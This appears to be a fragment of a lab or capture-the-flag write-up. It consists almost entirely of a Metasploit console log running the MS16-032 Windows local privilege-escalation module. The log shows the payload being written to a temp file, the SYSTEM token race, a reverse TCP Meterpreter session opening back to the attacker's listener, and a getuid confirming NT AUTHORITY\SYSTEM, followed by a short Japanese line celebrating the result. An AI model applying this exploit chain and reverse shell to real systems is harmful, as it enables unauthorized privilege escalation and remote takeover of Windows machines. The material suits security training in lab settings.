msf6 exploit(windows/local/ms16_032_secondary_logon_handle_privesc) > run [*] Started reverse TCP handler on 10.10.15.3:4444 [+] Compressed size: 1016 [!] Executing 32-bit payload on 64-bit ARCH, using SYSWOW64 powershell [*] Writing payload file, C:\Users\kostas\AppData\Local\Temp\PJkXiFJ.ps1... [*] Compressing script contents... [+] Compressed size: 3596 [*] Executing exploit script... __ __ ___ ___ ___ ___ ___ ___ | V | _|_ | | _|___| |_ |_ | | |_ |_| |_| . |___| | |_ | _| |_|_|_|___|_____|___| |___|___|___| [by b33f -> @FuzzySec] [?] Operating system core count: 2 [>] Duplicating CreateProcessWithLogonW handle [?] Done, using thread handle: 1668 [*] Sniffing out privileged impersonation token.. [?] Thread belongs to: svchost [+] Thread suspended [>] Wiping current impersonation token [>] Building SYSTEM impersonation token [?] Success, open SYSTEM token handle: 1664 [+] Resuming thread.. [*] Sniffing out SYSTEM shell.. [>] Duplicating SYSTEM token [>] Starting token race [>] Starting process race [!] Holy handle leak Batman, we have a SYSTEM shell!! Xq5W9PjuLpljAZQdaDRsBXL2hBGuiRkj [+] Executed on target machine. [*] Sending stage (175174 bytes) to 10.10.10.8 [*] Meterpreter session 6 opened (10.10.15.3:4444 -> 10.10.10.8:49177) at 2021-02-27 12:17:41 +0900 [+] Deleted C:\Users\kostas\AppData\Local\Temp\PJkXiFJ.ps1 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
SYSTEM権限をGET